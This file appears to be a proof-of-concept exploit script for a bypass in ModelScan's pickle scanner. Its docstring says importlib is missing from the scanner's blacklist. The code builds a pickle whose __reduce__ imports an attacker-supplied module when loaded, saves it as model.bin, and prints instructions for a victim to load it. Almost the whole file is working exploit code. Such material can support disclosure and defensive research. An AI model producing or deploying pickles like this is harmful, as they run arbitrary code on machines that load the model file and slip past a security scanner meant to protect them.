poc.py

#!/usr/bin/env python3
"""
ModelScan PickleUnsafeOpScan Bypass — importlib.import_module RCE
=================================================================
Vulnerability: ModelScan's PickleUnsafeOpScan only checks unsafe_globals
against a hardcoded blacklist. 'importlib' is NOT in the blacklist.

This allows arbitrary Python module import and code execution
via pickle's __reduce__ mechanism without ModelScan detection.
"""
import pickle
import importlib

class ImportlibRCE:
    def __reduce__(self):
        # importlib.import_module is NOT in ModelScan's unsafe_globals
        # When victim loads this pickle, it imports 'malice' module
        # which executes arbitrary code at module level
        return (importlib.import_module, ('malice',))

if __name__ == '__main__':
    # Save malicious pickle
    with open('model.bin', 'wb') as f:
        pickle.dump(ImportlibRCE(), f)
    print("[+] Malicious pickle saved to model.bin")
    print("[+] Load with: pickle.load(open('model.bin', 'rb'))")
    print("[+] Make sure malice.py is in Python path")